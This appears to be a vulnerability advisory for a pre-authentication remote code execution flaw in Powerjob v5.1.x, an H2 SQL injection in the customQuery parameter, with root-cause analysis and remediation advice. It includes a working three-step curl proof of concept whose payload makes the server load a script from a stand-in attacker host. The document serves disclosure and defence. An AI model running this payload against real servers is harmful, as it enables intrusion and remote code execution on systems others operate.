Powerjob v5.1.x Pre-Auth RCE via H2 SQL Injection in customQuery

### Vulnerability Overview * **Title**: Unauthenticated Remote Code Execution: H2 SQL Injection in `customQuery` Parameter (#1167) * **Vulnerability Type**: Pre-Auth Remote Code Execution (RCE) * **Severity**: Critical * **Affected Versions**: Powerjob v5.1.0 ~ v5.1.2 (all v5.1.x versions, including `latest`) * **Prerequisites**: No authentication required; exploitable with default configurations. * **Attack Vectors**: `/openApi/saveJob`, `/openApi/runJob`, `/instance/detailPlus` ### Root Cause Analysis 1. **OpenApi Default No Authentication**: In `OpenApiInterceptor.java`, the `enableOpenApiAuth` flag defaults to `false`, allowing all endpoints under `/openApi/*` to be accessed without authentication. 2. **Missing Permission Checks**: The `getInstanceDetailPlus` method in `InstanceController.java` lacks the `@ApiPermission` annotation, resulting in no access control for the `/instance/detailPlus` endpoint. 3. **SQL Injection**: Although the `customQuery` parameter includes keyword blacklist filtering, the `RUNSCRIPT` keyword is not filtered, allowing the execution of remote scripts within the H2 database. ### Attack Chain and POC Attackers can construct specific HTTP requests to leverage the H2 database's `RUNSCRIPT` functionality to load remote malicious SQL scripts, thereby executing system commands. **Key Exploitation Steps:** 1. **POST `/openApi/saveJob`**: Create a BROADCAST type job (triggering `HeavyTaskTracker`). 2. **POST `/openApi/runJob`**: Trigger the job execution. 3. **POST `/instance/detailPlus`**: Inject payload via the `customQuery` parameter to execute `RUNSCRIPT`. **POC Code (curl commands):** ```bash # Step 1: Create a job curl -X POST http://127.0.0.1:8080/openApi/saveJob -H "Content-Type: application/json" -d '{"appId":1,"jobName":"test","jobType":1,"customQuery":"1=1; RUNSCRIPT FROM '\''http://attacker/exp.sql'\'';--"}' # Step 2: Trigger job execution curl -X POST http://127.0.0.1:8080/openApi/runJob -H "Content-Type: application/json" -d '{"appId":1,"jobId":1}' # Step 3: Inject payload (trigger Worker execution) curl -X POST http://127.0.0.1:8080/instance/detailPlus -H "Content-Type: application/json" -d '{"appId":1,"jobId":1,"customQuery":"1=1; RUNSCRIPT FROM '\''http://attacker/exp.sql'\'';--"}' ``` ### Remediation Recommendations 1. **Implement Authentication**: Add the `@ApiPermission` annotation to the `/instance/detailPlus` endpoint. 2. **Enhance Filtering**: Add H2 database-specific keywords such as `RUNSCRIPT`, `CALL`, and `LINK` to the blacklist filtering mechanism.

Goal Reached Thanks to every supporter — we hit 100%!

Powerjob v5.1.x Pre-Auth RCE via H2 SQL Injection in customQuery

More from this source